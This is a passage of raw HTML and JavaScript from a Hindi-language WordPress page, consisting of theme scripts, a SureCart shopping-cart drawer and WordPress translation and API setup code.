<script id='kirki-viewport-lists'>var kirkiViewports = {"md":{"value":1200,"scale":1,"minWidth":1200,"maxWidth":1200,"title":"Desktop","icon":"desktop","activeIcon":"desktop-hover","id":"md","type":"max"},"tablet":{"value":991,"scale":1,"minWidth":991,"maxWidth":991,"title":"Tablet","icon":"tablet-default","activeIcon":"tablet-hover","type":"max","id":"tablet"},"mobileLandscape":{"value":767,"scale":1,"minWidth":767,"maxWidth":767,"title":"Landscape","icon":"phone-hr-default","activeIcon":"phone-hr-hover","type":"max","id":"mobileLandscape"},"mobile":{"value":575,"scale":1,"minWidth":575,"maxWidth":575,"title":"Mobile","icon":"phone-vr-default","activeIcon":"phone-vr-hover","type":"max","id":"mobile"}};</script><script id='kirki-variable-lists'>var kirkiCSSVariable = {"data":[{"title":"Colors","key":"color","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Numbers","key":"size","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Text Styles","key":"text-style","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Font Family","key":"font-family","modes":[{"title":"Default","key":"default"}],"variables":[]}]};</script><script id="kirki-api-and-nonce">
window.wp_kirki = {
ajaxUrl: "https://wp-security.org/wp-admin/admin-ajax.php",
restUrl: "https://wp-security.org/hi/wp-json/",
siteUrl: "https://wp-security.org",
apiVersion: "v1",
postId: "803",
nonce: "f97c22eafd",
call_from: "",
templateId: "",
context: {"id":803,"type":"post"}
};
</script><script id="wp-importmap" type="importmap">
{"imports":{"@wordpress/interactivity":"https://wp-security.org/wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=efaa5193bbad9c60ffd1","@surecart/checkout":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=3bbe28b8db1e11147c67","@surecart/checkout-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-events/index.js?ver=ed9647bd6c7865efe2ad","@surecart/checkout-service":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-actions/index.js?ver=e445a0ee0396d75d52c0","@surecart/google-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/google/index.js?ver=d92e383a18bcf54ea538","@surecart/facebook-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/facebook/index.js?ver=cf5c6499cb7b867894c1","@wordpress/a11y":"https://wp-security.org/wp-includes/js/dist/script-modules/a11y/index.min.js?ver=1c371cb517a97cdbcb9f","@surecart/api-fetch":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/fetch/index.js?ver=1bfba8ea0694a193022a"}}
</script>
<script id="@surecart/line-item-note-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/line-item-note/index.js?ver=af6cf14267b5a9ad219f" type="module"></script>
<script id="@surecart/checkout-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=3bbe28b8db1e11147c67" type="module"></script>
<script id="@surecart/cart-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/cart/index.js?ver=c2f35b71b4309df849fe" type="module"></script>
<script id="@surecart/order-bumps-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/order-bumps/index.js?ver=c639def39210a6244eb2" type="module"></script>
<script id="wp-script-module-data-@wordpress/interactivity" type="application/json">
{"state":{"surecart/order-bumps":{"currentPage":1,"perPage":3},"surecart/checkout":{"checkout":{"line_items":{"data":[]}},"discountIsRedeemable":false,"isDiscountApplied":false,"hasDiscountAmount":false,"hasSubtotalScratchAmount":false,"itemsCount":0,"hasItems":false}}}
</script>
<div id="fb-root"></div>
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/hi_IN/sdk.js#xfbml=1&version=v17.0&appId=&autoLogAppEvents=1" nonce="Ci8te34e"></script>
<script>
window.scFetchData =
{"root_url":"https:\/\/wp-security.org\/hi\/wp-json\/","nonce":"f97c22eafd","nonce_endpoint":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php?action=sc-rest-nonce"} </script>
<!-- Render the cart. --> <div data-wp-context='{"formId":131,"mode":"live"}' data-wp-interactive='{ "namespace": "surecart/checkout" }' data-wp-init="callbacks.init" data-wp-watch="callbacks.onChangeCheckout" data-wp-on-window--storage="callbacks.syncTabs" class="sc-cart-wrapper is-layout-flow wp-container-surecart-slide-out-cart-is-layout-c8108a87 wp-block-surecart-slide-out-cart-is-layout-flow" > <div style="font-size:15px;width: 525px" class="sc-drawer sc-cart-drawer wp-block-surecart-slide-out-cart" role="dialog" data-wp-bind--aria-label="surecart/cart::state.ariaLabel" data-wp-class--open="surecart/cart::state.open" data-wp-on--keydown="surecart/cart::actions.handleKeydown" > <!-- Cart alert --> <div class="sc-alert sc-alert__alert--danger" role="alert" aria-live="assertive" aria-atomic="true" data-wp-bind--hidden="!state.error" hidden> <div class="sc-alert__icon"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10" /> <line x1="12" y1="8" x2="12" y2="12" /> <line x1="12" y1="16" x2="12.01" y2="16" /> </svg> </div> <div class="sc-alert__text"> <div class="sc-alert__title"> <span data-wp-text="state.errorTitle"></span> </div> <div class="sc-alert__message"> <div data-wp-text="state.errorMessage"></div> <template data-wp-each--message="state.additionalErrors"> <div> <span data-wp-text="context.message"></span> </div> </template> </div> </div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-64e1162d wp-block-group-is-layout-flex" style="padding-top:1.5em;padding-right:2em;padding-bottom:0em;padding-left:2em"> <div style="line-height:1" class="wp-block-surecart-cart-close-button" data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keypress="surecart/cart::actions.toggle" role="button" tabindex="0" aria-label="कार्ट बंद करें" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> <polyline points="12 5 19 12 12 19" /> </svg> </div> <p class="wp-block-paragraph" style="margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;font-size:16px;font-style:normal;font-weight:500;line-height:1"> मेरा ऑर्डर देखें</p> <span style="font-size:14px;font-weight:600;line-height:1;border-radius:4px;padding-top:6px;padding-bottom:6px;padding-left:10px;padding-right:10px" class="wp-block-surecart-cart-count" data-wp-text="state.itemsCount">0</span> </div> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div style="padding-top:2em;padding-bottom:2em;padding-left:2em;padding-right:2em" class="wp-block-surecart-slide-out-cart-line-items is-layout-flow wp-container-surecart-slide-out-cart-line-items-is-layout-2e48a420 wp-block-surecart-slide-out-cart-line-items-is-layout-flow" role="list"> <template data-wp-each--line_item="state.checkoutLineItems" data-wp-each-key="context.line_item.id" > <div class="sc-product-line-item" data-wp-class--sc-product-line-item--has-swap="state.swap" role="listitem" data-wp-bind--aria-label="state.lineItemAriaLabel"> <div class="sc-product-line-item__content"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-92927b4a wp-block-group-is-layout-flex"> <figure class="sc-cart-line-item-image-wrap wp-container-content-962be591 wp-duotone-unset-1" data-wp-bind--hidden="!context.line_item.image.src"> <img style="margin-top:0;margin-bottom:0;aspect-ratio:1;border-radius:4px;border-width:1px;margin-top:0;margin-bottom:0" class="sc-is-covered wp-block-surecart-cart-line-item-image" data-wp-bind--alt="context.line_item.image.alt" data-wp-bind--srcset="context.line_item.image.srcset" data-wp-bind--sizes="context.line_item.image.sizes" data-wp-bind--src="context.line_item.image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-content-justification-stretch is-nowrap is-layout-flex wp-container-core-group-is-layout-41c7e08e wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-53e22457 wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <a style="font-style:normal;font-weight:500;line-height:1.4;text-decoration:none" class="wp-block-surecart-cart-line-item-title" data-wp-bind--href="state.lineItemPermalink"> <span data-wp-text="context.line_item.price.product.name"></span> </a> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <div style="font-size:14px;line-height:1.4" class="wp-block-surecart-cart-line-item-price-name" data-wp-text="state.lineItemPriceName" data-wp-bind--hidden="!state.lineItemPriceName"></div> <div style="font-size:14px;line-height:1.4" class="wp-block-surecart-cart-line-item-variant" data-wp-text="state.lineItemVariant" data-wp-bind--hidden="!state.lineItemVariant"></div> <div data-wp-interactive='{ "namespace": "surecart/line-item-note" }' style="font-size:14px;line-height:1.4" class="wp-block-surecart-cart-line-item-note" data-wp-context='{}' data-wp-run="callbacks.init" data-wp-class--line-item-note--is-expanded="context.noteExpanded" data-wp-class--line-item-note--is-collapsible="context.showToggle" data-wp-bind--hidden="surecart/checkout::!state.lineItemNote" data-wp-on--click="actions.toggleNoteExpanded" data-wp-on--keydown="actions.toggleNoteExpanded" data-wp-bind--role="button" data-wp-bind--disabled="!context.showToggle" data-wp-bind--aria-expanded="context.noteExpanded" data-wp-bind--aria-label="Toggle note visibility" tabindex="0" > <div class="line-item-note__text" data-wp-text="surecart/checkout::state.lineItemNote" ></div> <span class="sc-icon" data-wp-class--sc-icon--rotated="context.noteExpanded" > <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="6 9 12 15 18 9" /> </svg> </span> </div> </div></div> <div class="sc-product-line-item__purchasable-status wp-block-surecart-cart-line-item-status has-text-align-right" data-wp-text="context.line_item.purchasable_status_display" data-wp-bind--hidden="!context.line_item.purchasable_status_display" role="status" aria-live="polite" aria-atomic="true" > </div> </div></div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f843080e wp-block-group-is-layout-flex" style="line-height:1.4"> <div class="wp-block-surecart-cart-line-item-scratch-amount" data-wp-text="context.line_item.scratch_display_amount" data-wp-bind--hidden="!state.lineItemHasScratchAmount" ></div> <div style="font-style:normal;font-weight:500" class="wp-block-surecart-cart-line-item-amount has-text-align-right" data-wp-text="context.line_item.subtotal_display_amount"></div> <div style="font-size:14px" class="wp-block-surecart-cart-line-item-interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text"> <span class="wp-block-surecart-cart-line-item-interval__interval" data-wp-bind--hidden="!context.line_item.price.short_interval_text" data-wp-text="context.line_item.price.short_interval_text" ></span> <span class="wp-block-surecart-cart-line-item-interval__count" data-wp-bind--hidden="!context.line_item.price.short_interval_count_text" data-wp-text="context.line_item.price.short_interval_count_text" ></span> </div> </div> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <div style="font-size:14px" class="wp-block-surecart-cart-line-item-trial has-text-align-right" data-wp-bind--hidden="!context.line_item.price.trial_text" data-wp-text="context.line_item.price.trial_text" ></div> <template data-wp-each--fee="state.lineItemFees" data-wp-each-key="context.fee.id" > <div style="font-size:14px" class="wp-block-surecart-cart-line-item-fees has-text-align-right"> <span style="font-size:14px" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.display_amount" ></span> <span style="font-size:14px" class="wp-block-surecart-cart-line-item-fees has-text-align-right" data-wp-text="context.fee.description" ></span> </div> </template> </div></div> </div></div> </div> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-e5460375 wp-block-group-is-layout-flex"> <div class="wp-block-group wp-container-content-9cfa9a5a"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><div class="sc-input-group sc-input-group-sm sc-quantity-selector wp-block-surecart-cart-line-item-quantity" data-wp-class--quantity--disabled="state.isQuantityDisabled" data-wp-bind--hidden="!state.isEditable" hidden="1"> <div class="sc-input-group-text sc-quantity-selector__decrease" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityDecrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityDecrease" data-wp-bind--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityDecreaseDisabled" data-wp-class--button--disabled="state.isQuantityDecreaseDisabled" data-wp-bind--aria-label="surecart/checkout::state.decreaseQuantityAriaLabel" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> <input type="number" class="sc-form-control sc-quantity-selector__control" data-wp-bind--value="context.line_item.quantity" data-wp-on--change="surecart/checkout::actions.onQuantityChange" data-wp-bind--min="context.line_item.min" data-wp-bind--aria-valuemin="context.line_item.min" data-wp-bind--max="context.line_item.max" data-wp-bind--aria-valuemax="context.line_item.max" data-wp-bind--aria-valuenow="context.line_item.quantity" data-wp-bind--disabled="surecart/checkout::state.loading" data-wp-bind--aria-label="surecart/checkout::state.quantityInputAriaLabel" step="1" autocomplete="off" role="spinbutton" /> <div class="sc-input-group-text sc-quantity-selector__increase" role="button" tabindex="0" data-wp-on--click="surecart/checkout::actions.onQuantityIncrease" data-wp-on--keydown="surecart/checkout::actions.onQuantityIncrease" data-wp-bind--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-disabled="state.isQuantityIncreaseDisabled" data-wp-class--button--disabled="state.isQuantityIncreaseDisabled" data-wp-bind--aria-label="surecart/checkout::state.increaseQuantityAriaLabel" > <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </div> </div> </div></div> <div class="wp-block-group is-vertical is-content-justification-right is-layout-flex wp-container-core-group-is-layout-4c9338fd wp-block-group-is-layout-flex"> <div style="font-size:14px;font-style:normal;font-weight:400" class="wp-block-surecart-cart-line-item-remove" data-wp-bind--aria-label="surecart/checkout::state.removeItemAriaLabel" data-wp-on--click="surecart/checkout::actions.removeLineItem" data-wp-on--keydown="surecart/checkout::actions.removeLineItem" role="button" tabindex="0" > <svg class="wp-block-surecart-cart-line-item-remove__icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="18" y1="6" x2="6" y2="18" /> <line x1="6" y1="6" x2="18" y2="18" /> </svg> <span class="wp-block-surecart-cart-line-item-remove__label"> हटाएँ </span> </div> </div> </div> </div> </div> </div></div> </div> <div class="sc-product-line-item__swap" data-wp-bind--hidden="!state.swap" hidden data-wp-on--click="actions.toggleSwap"> <div class="sc-product-line-item__swap-content"> <button type="button" class="sc-toggle" role="switch" aria-checked="false" data-wp-bind--aria-checked="context.line_item.swap" data-wp-class--sc-toggle--checked="context.line_item.swap"> <span class="sc-toggle__label">सेटिंग का उपयोग करें</span> <span aria-hidden="true" class="sc-toggle__knob"></span> </button> <span data-wp-text="state.swap.description"></span> </div> <div class="sc-product-line-item__swap-amount"> <span data-wp-text="state.swapDisplayAmount" class="sc-product-line-item__swap-amount-value"></span> <span data-wp-text="state.swapIntervalText" class="sc-product-line-item__swap-amount-interval"></span> <span data-wp-text="state.swapIntervalCountText" class="sc-product-line-item__swap-amount-interval-count"></span> </div> </div> </div> </template> </div> </div></div> <div class="wp-block-group" style="border-top-color:#b0b0b069;border-top-width:1px;padding-top:0em;padding-right:0em;padding-bottom:0em;padding-left:0em"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"> <div style="border-bottom-width:1px;border-bottom-color:#b0b0b069;padding-top:1.5em;padding-bottom:1.5em;padding-left:2em;padding-right:2em" class="wp-block-surecart-cart-order-bumps" data-wp-context='{"hideAddedItems":true}' data-wp-interactive='{ "namespace": "surecart/order-bumps" }' data-wp-init="callbacks.init" data-wp-bind--hidden="!state.hasOrderBumps" hidden> <div class="wp-block-group is-content-justification-space-between is-nowrap is-layout-flex wp-container-core-group-is-layout-768bb735 wp-block-group-is-layout-flex" style="margin-bottom:0.75em"> <p class="wp-block-paragraph" style="margin-top:0;margin-bottom:0;font-style:normal;font-weight:500">आपके लिए सुझाया गया</p> <nav class="wp-block-surecart-cart-order-bump-pagination is-layout-flex wp-container-surecart-cart-order-bump-pagination-is-layout-00ae689d wp-block-surecart-cart-order-bump-pagination-is-layout-flex" data-wp-bind--hidden="!state.showPagination" aria-label="ऑर्डर बम्प्स पेजिनेशन" hidden> <div aria-disabled="true" disabled class="has-arrow-type-chevron wp-block-surecart-cart-order-bump-pagination-previous" data-wp-on--click="surecart/order-bumps::actions.previousPage" data-wp-on--keydown="surecart/order-bumps::actions.handlePreviousKeydown" data-wp-bind--disabled="!state.hasPreviousPage" data-wp-bind--aria-disabled="!state.hasPreviousPage" aria-label="पिछला पृष्ठ" role="button" tabindex="0" > <svg aria-hidden="true" class="wp-block-surecart-cart-order-bump-pagination-previous__icon" xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="15 18 9 12 15 6" /> </svg> </div> <div aria-disabled="true" disabled class="has-arrow-type-chevron wp-block-surecart-cart-order-bump-pagination-next" data-wp-on--click="surecart/order-bumps::actions.nextPage" data-wp-on--keydown="surecart/order-bumps::actions.handleNextKeydown" data-wp-bind--disabled="!state.hasNextPage" data-wp-bind--aria-disabled="!state.hasNextPage" aria-label="अगला पृष्ठ" role="button" tabindex="0" > <svg aria-hidden="true" class="wp-block-surecart-cart-order-bump-pagination-next__icon" xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="9 18 15 12 9 6" /> </svg> </div> </nav> </div> <ul class="wp-block-surecart-cart-order-bump-template is-layout-flex wp-container-surecart-cart-order-bump-template-is-layout-e99f66c5 wp-block-surecart-cart-order-bump-template-is-layout-flex" role="list" data-wp-class--has-overflow="state.hasMultipleBumps" data-wp-on--scrollend="callbacks.onCarouselScroll" data-wp-on--keydown="actions.handleCarouselKeydown" tabindex="0" data-wp-bind--aria-label="state.orderBumpsListAriaLabel" > <template data-wp-each--bump="state.orderBumps" data-wp-each-key="context.bump.id" > <li class="sc-cart-order-bump-item" role="listitem"> <div class="wp-block-group has-border-color wp-container-content-9cfa9a5a is-nowrap is-layout-flex wp-container-core-group-is-layout-e91b8ce6 wp-block-group-is-layout-flex" style="border-color:#e0e0e0;border-width:1px;border-radius:12px;padding-top:0.75em;padding-right:1em;padding-bottom:0.75em;padding-left:0.75em"> <figure class="sc-cart-order-bump-image-wrap wp-container-content-d0d0a6b5" data-wp-bind--hidden="!context.bump.price.product.line_item_image.src"> <img style="aspect-ratio:1;width:72px;border-radius:8px" class="sc-is-covered wp-block-surecart-cart-order-bump-image" data-wp-bind--alt="context.bump.price.product.name" data-wp-bind--src="context.bump.price.product.line_item_image.src" loading="lazy" /> </figure> <div class="wp-block-group wp-container-content-9cfa9a5a is-vertical is-layout-flex wp-container-core-group-is-layout-0370e391 wp-block-group-is-layout-flex"> <span style="font-size:15px;font-weight:600;line-height:1.3" class="wp-block-surecart-cart-order-bump-title" data-wp-text="context.bump.name" ></span> <div style="color:#6b7280;font-size:13px;line-height:1.3" class="wp-block-surecart-cart-order-bump-description has-text-color" data-wp-bind--hidden="!context.bump.metadata.description" data-wp-text="context.bump.metadata.description" hidden></div> <div class="wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-0cf19278 wp-block-group-is-layout-flex"> <div style="font-size:14px" class="wp-block-surecart-cart-order-bump-scratch-amount" data-wp-text="context.bump.subtotal_display_amount" data-wp-bind--hidden="!state.bumpHasDiscount" ></div> <div style="font-size:14px;font-weight:500" class="wp-block-surecart-cart-order-bump-amount" data-wp-text="context.bump.total_display_amount"></div> </div> </div> <div style="font-size:18px;font-weight:400;border-color:#d1d5db;border-top-left-radius:74.6%;border-top-right-radius:74.6%;border-bottom-left-radius:74.6%;border-bottom-right-radius:74.6%;border-width:1px;padding-top:0.5em;padding-bottom:0.5em;padding-left:0.5em;padding-right:0.5em" class="sc-cart-order-bump-add-button wp-block-surecart-cart-order-bump-add-button has-border-color" role="button" tabindex="0" data-wp-on--click="surecart/order-bumps::actions.addBumpToCart" data-wp-on--keydown="surecart/order-bumps::actions.handleAddButtonKeydown" data-wp-bind--disabled="state.isBumpInCart" data-wp-bind--aria-disabled="state.isBumpInCart" data-wp-class--sc-cart-order-bump-add-button--added="state.isBumpInCart" data-wp-bind--aria-label="state.addButtonAriaLabel" aria-label="कार्ट में जोड़ें" > <span class="sc-cart-order-bump-add-button__icon" aria-hidden="true" data-wp-bind--hidden="state.isBumpInCart"> <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <line x1="12" y1="5" x2="12" y2="19" /> <line x1="5" y1="12" x2="19" y2="12" /> </svg> </span> <span class="sc-cart-order-bump-add-button__icon" aria-hidden="true" data-wp-bind--hidden="!state.isBumpInCart" hidden> <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <polyline points="20 6 9 17 4 12" /> </svg> </span> </div> </div> </li> </template> </ul> </div> <div class="wp-block-group" style="margin-top:0;margin-bottom:0;padding-top:2em;padding-right:2em;padding-bottom:2em;padding-left:2em"><div class="wp-block-group__inner-container is-layout-constrained wp-container-core-group-is-layout-491b0754 wp-block-group-is-layout-constrained"> <div class="wp-block-surecart-slide-out-cart-items-subtotal is-content-justification-space-between is-nowrap is-layout-flex wp-container-surecart-slide-out-cart-items-subtotal-is-layout-0a93696a wp-block-surecart-slide-out-cart-items-subtotal-is-layout-flex"> <div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-container-core-group-is-layout-c8108a87 wp-block-group-is-layout-flow"> <p class="wp-block-paragraph" style="margin-top:0px;margin-bottom:0px;font-size:18px;font-style:normal;font-weight:500;line-height:1.4"> उप-योग</p> <p class="has-text-color has-link-color wp-elements-3ccbd622ec95a2fb9ce4984e15710a06 wp-block-paragraph" style="color:var(--sc-input-help-text-color);font-size:14px;line-height:1.4">चेकआउट पर कर और शिपिंग की गणना की गई</p> </div></div> <div class="wp-block-group is-content-justification-right is-nowrap is-layout-flex wp-container-core-group-is-layout-f843080e wp-block-group-is-layout-flex"><span style="font-size:18px;line-height:1.4" class="wp-block-surecart-cart-subtotal-scratch-amount" data-wp-text="state.checkout.subtotal_scratch_display_amount" data-wp-bind--hidden="!state.hasSubtotalScratchAmount" data-wp-bind--aria-label="state.subtotalScratchAriaLabel" hidden></span> <span style="font-size:18px;font-style:normal;font-weight:500;line-height:1.4" class="wp-block-surecart-cart-subtotal-amount" data-wp-text="state.checkout.subtotal_display_amount"></span> </div> </div> <div class="sc-cart-items-submit__wrapper" style="" > <div class="wp-block-button"> <a style="border-radius:4px" class="wp-block-button__link wp-element-button sc-button__link wp-block-surecart-slide-out-cart-items-submit" href="https://wp-security.org/hi/checkout/" data-wp-bind--disabled="state.loading" data-wp-class--sc-button__link--busy="state.loading" > <span class="sc-spinner" aria-hidden="false"></span> <span class="sc-button__link-text">चेकआउट</span> </a> </div> </div> </div></div> </div></div> <div class="sc-block-ui" data-wp-bind--hidden="!state.loading" hidden></div> </div> <!-- backdrop --> <div class="sc-drawer__backdrop" data-wp-on--mousedown="surecart/cart::actions.closeOverlay" data-wp-on--touchstart="surecart/cart::actions.closeOverlay" data-wp-class--show="surecart/cart::state.open" data-wp-on--keydown="surecart/cart::actions.handleKeydown"></div> </div> <!-- Render floating cart icon --> <div data-wp-interactive='{ "namespace": "surecart/checkout" }' class="wp-block-surecart-cart-icon" data-wp-context='{"formId":131,"mode":"live"}' data-wp-on--click="surecart/cart::actions.toggle" data-wp-on--keydown="surecart/cart::actions.toggle" tabindex="0" role="button" data-wp-bind--hidden="!state.hasItems" hidden> <div class="wp-block-surecart-cart-icon__container"> <div class="wp-block-surecart-cart-icon__icon" aria-label="कार्ट बटन।."> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <path d="M6 2L3 6v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V6l-3-4z" /> <line x1="3" y1="6" x2="21" y2="6" /> <path d="M16 10a4 4 0 0 1-8 0" /> </svg> </div> <span class="wp-block-surecart-cart-icon__count" data-wp-text="state.itemsCount" data-wp-bind--aria-label="state.itemsCountAriaLabel" >0</span> </div> </div><script id="wp-url-js" src="https://wp-security.org/wp-includes/js/dist/url.min.js?ver=bb0f766c3d2efe497871"></script>
<script id="wp-hooks-js" src="https://wp-security.org/wp-includes/js/dist/hooks.min.js?ver=7496969728ca0f95732d"></script>
<script id="wp-i18n-js" src="https://wp-security.org/wp-includes/js/dist/i18n.min.js?ver=781d11515ad3d91786ec"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
//# sourceURL=wp-i18n-js-after
</script>
<script id="wp-api-fetch-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", {"translation-revision-date":"2024-02-25 08:05:38+0000","generator":"GlotPress\/4.0.1","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n != 1;","lang":"hi_IN"},"The response is not a valid JSON response.":["\u092a\u094d\u0930\u0924\u093f\u0915\u094d\u0930\u093f\u092f\u093e \u0935\u0948\u0927 JSON \u092a\u094d\u0930\u0924\u093f\u0915\u094d\u0930\u093f\u092f\u093e \u0928\u0939\u0940\u0902 \u0939\u0948\u0964"],"An unknown error occurred.":["\u090f\u0915 \u0905\u091c\u094d\u091e\u093e\u0924 \u0924\u094d\u0930\u0941\u091f\u093f \u0939\u0941\u0908\u0964"],"Media upload failed. If this is a photo or a large image, please scale it down and try again.":["\u092e\u0940\u0921\u093f\u092f\u093e \u0905\u092a\u0932\u094b\u0921 \u0935\u093f\u092b\u0932 \u0930\u0939\u093e\u0964 \u092f\u0926\u093f \u092f\u0939 \u090f\u0915 \u092b\u093c\u094b\u091f\u094b \u092f\u093e \u092c\u0921\u093c\u0940 \u091b\u0935\u093f \u0939\u0948, \u0924\u094b \u0915\u0943\u092a\u092f\u093e \u0907\u0938\u0947 \u0928\u0940\u091a\u0947 \u092a\u0948\u092e\u093e\u0928\u0947 \u092a\u0930 \u0930\u0916\u0947\u0902 \u0914\u0930 \u092a\u0941\u0928\u0903 \u092a\u094d\u0930\u092f\u093e\u0938 \u0915\u0930\u0947\u0902\u0964"],"You are probably offline.":["\u0906\u092a \u0936\u093e\u092f\u0926 \u0911\u092b\u093c\u0932\u093e\u0907\u0928 \u0939\u0948\u0902\u0964"]}},"comment":{"reference":"wp-includes\/js\/dist\/api-fetch.js"}} );
//# sourceURL=wp-api-fetch-js-translations
</script>
<script id="wp-api-fetch-js" src="https://wp-security.org/wp-includes/js/dist/api-fetch.min.js?ver=d7efe4dc1468d36c39b8"></script>
<script id="wp-api-fetch-js-after">
wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "https://wp-security.org/hi/wp-json/" ) );
wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "f97c22eafd" );
wp.apiFetch.use( wp.apiFetch.nonceMiddleware );
wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );
wp.apiFetch.nonceEndpoint = "https://wp-security.org/wp-admin/admin-ajax.php?action=rest-nonce";
//# sourceURL=wp-api-fetch-js-after
</script>
<script id="wp-dom-ready-js" src="https://wp-security.org/wp-includes/js/dist/dom-ready.min.js?ver=a06281ae5cf5500e9317"></script>
<script id="wp-a11y-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
